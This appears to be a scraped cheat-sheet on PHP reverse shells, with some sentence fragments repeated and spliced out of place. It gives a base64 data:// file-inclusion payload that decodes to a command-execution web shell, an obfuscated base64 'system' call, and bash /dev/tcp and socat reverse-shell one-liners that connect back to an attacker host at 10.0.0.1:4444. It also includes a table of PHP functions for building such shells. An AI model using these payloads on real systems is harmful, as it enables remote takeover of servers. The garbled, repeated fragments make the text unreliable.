If you can include files, include a PHP wrapper:
https://target.com/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2BCg
$cmd = base64_decode("c3lzdGVt"); // "system"
$cmd($_GET['c']);
When you have limited character space (e.g., SQL injection into a SELECT INTO OUTFILE or a vulnerable eval()), a one-liner is king. reverse shell php top
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'");?>
Note: This uses /dev/tcp, which works on Linux systems with bash compiled with net-redirections. Does not work on Windows or some slim containers. If you can include files, include a PHP
Alternative One-Liner (More portable):
<?php system("socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4444");?>
The basic concept involves:
| Function | Purpose |
|----------|---------|
| fsockopen() | Open TCP socket connection to attacker |
| pfsockopen() | Persistent version of fsockopen |
| socket_create() | Low-level socket creation |
| exec(), system() | Execute OS commands |
| proc_open() | Advanced process control (with pipes) |
| die() or exit() | Terminate script if connection fails |
| fwrite() / fread() | Read/write over socket |
| shell_exec() | Return command output as string | When you have limited character space (e
A PHP reverse shell is a script written in PHP that, when executed on a server, initiates a TCP or UDP connection back to an attacker's machine, granting remote command-line access. Unlike bind shells (which listen on a local port), reverse shells bypass many inbound firewall rules because the connection originates from the internal network.